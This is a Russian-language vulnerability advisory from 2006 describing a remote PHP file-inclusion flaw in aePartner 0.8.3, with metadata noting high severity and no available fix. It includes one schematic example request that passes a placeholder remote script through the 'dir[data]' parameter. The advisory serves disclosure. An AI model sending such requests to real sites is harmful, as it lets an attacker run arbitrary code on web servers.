PHP-инклюдинг в aePartner

Дата публикации:
13.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
1007
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
aePartner 0.x
Уязвимые версии: aePartner 0.8.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "dir[data]" в сценарии inc/design.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://www.site.com/[aePartner_path]/inc/design.inc.php?dir[data]=[evil_scripts]

URL производителя: www.lovecompass.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability

или введите имя

CAPTCHA